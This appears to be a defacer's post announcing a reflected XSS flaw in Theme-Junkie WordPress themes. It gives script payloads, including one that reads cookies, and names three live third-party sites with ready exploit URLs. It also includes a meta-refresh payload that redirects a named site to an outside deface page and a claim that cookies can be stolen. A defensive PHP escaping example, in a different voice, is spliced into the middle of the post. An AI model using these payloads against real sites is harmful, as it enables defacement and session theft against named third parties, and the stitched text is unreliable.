#-Hey, this is me, Aitezaz. In this post I will share my WordPress premium themes 0day.
The premium themes of the WordPress theme developer company Theme-Junkie are vulnerable to reflected XSS.
#
# [ Vulnerability Details ]
# Input fields are not properly sanitized, leading to cross-site scripting.
# All premium themes are vulnerable.
#
# - Visit the theme developer's site
# http://www.theme-junkie.com/
#
# [ XSS CODE ]
# <script>alert("SOG WAs Here");</script>
# <script>alert(document.cookie);</script>
# <script>window.open("http://www.google.com/")</script>
#
# Reflected XSS
# ==============
# http://SITE/?s=</script><script>alert("SOG WAs Here")</script>
#
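The fix on the theme side, as an added example (not Theme-Junkie's code, which the post does not show): a hypothetical `search.php` that prints the `s` parameter in the three contexts a theme typically reflects it, each with the matching WordPress escaping function. The template layout and variable names are assumptions.

```php
<?php
/**
 * search.php: hypothetical theme template, constructed for this example.
 * Each context that prints the `s` query gets the WordPress escaper for
 * that context; the unsafe form is described in the comment above it.
 */
get_header();

// Raw, unescaped query string. Treat as attacker-controlled from here on.
$query = get_search_query( false );
?>

<!-- 1. HTML body. Unsafe form: echo $_GET['s'] straight into the heading. -->
<h1>Search results for: <?php echo esc_html( $query ); ?></h1>

<!-- 2. Attribute value. Unsafe form: value="" filled with the raw parameter,
     which lets a double quote end the attribute. -->
<form role="search" method="get" action="<?php echo esc_url( home_url( '/' ) ); ?>">
    <input type="search" name="s" value="<?php echo esc_attr( $query ); ?>">
    <button type="submit">Search</button>
</form>

<?php
// 3. Inline script. Unsafe form: var q = "raw parameter"; there a closing
// script tag in the input ends the block, which is why the advisory's URL
// starts with one. The JSON_HEX_* flags emit <, >, &, ' and " as \uXXXX
// escapes, so the value cannot leave the string or the script element.
$flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
?>
<script>
    var searchQuery = <?php echo wp_json_encode( $query, $flags ); ?>;
</script>

<?php
get_footer();
```

To audit a theme for this issue, search its templates for `$_GET['s']`, `$_REQUEST['s']` or `get_search_query( false )` printed without one of these escapers.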
# Vulnerable sites
# =====================
#
# 1- http://www.paknetmafia.com/
# Theme Name = The WordPress theme in use is called "forester" (Designed By Theme-Junkie)
# Vul = http://www.paknetmafia.com/?s=<script>alert("SOG WAS HERE")</script>
#
# 2- http://www.windows8update.com
# Theme Name = The WordPress theme in use is called "weekly". (Designed By Theme-Junkie)
# Vul = http://www.windows8update.com/?s=<script>alert("SOG WAS HERE")</script>
#
# 3- http://sharethemes.net
# Theme Name = The WordPress theme in use is called "sharethemes". (Designed By Theme-Junkie)
# Vul = http://sharethemes.net/?s=<script>alert("SOG WAS HERE")</script>
#
# * Example of non-persistent reflected XSS:
# * Redirecting the website to our deface page
# * Example site: http://www.paknetmafia.com
# Put this code in the search bar, or paste it after http://www.paknetmafia.com/?s= <html><meta Http-equiv="refresh" content="0;url=http://pak-pak.co.cc/deface.html/"></html>
# The website will be redirected to your deface page.
#
# * You can also do cookie stealing.
# Video proof:
# YouTube = http://www.youtube.com/watch?v=U9jZlzi0uXY&feature=plcp
# Vimeo = https://vimeo.com/50359725
Plugins make us provide good input fields, and they extend the look and functionality of our web site.
Wordpress Themes
Good Job SOG Bro <3 :D
By ScOrPiOn <3 :D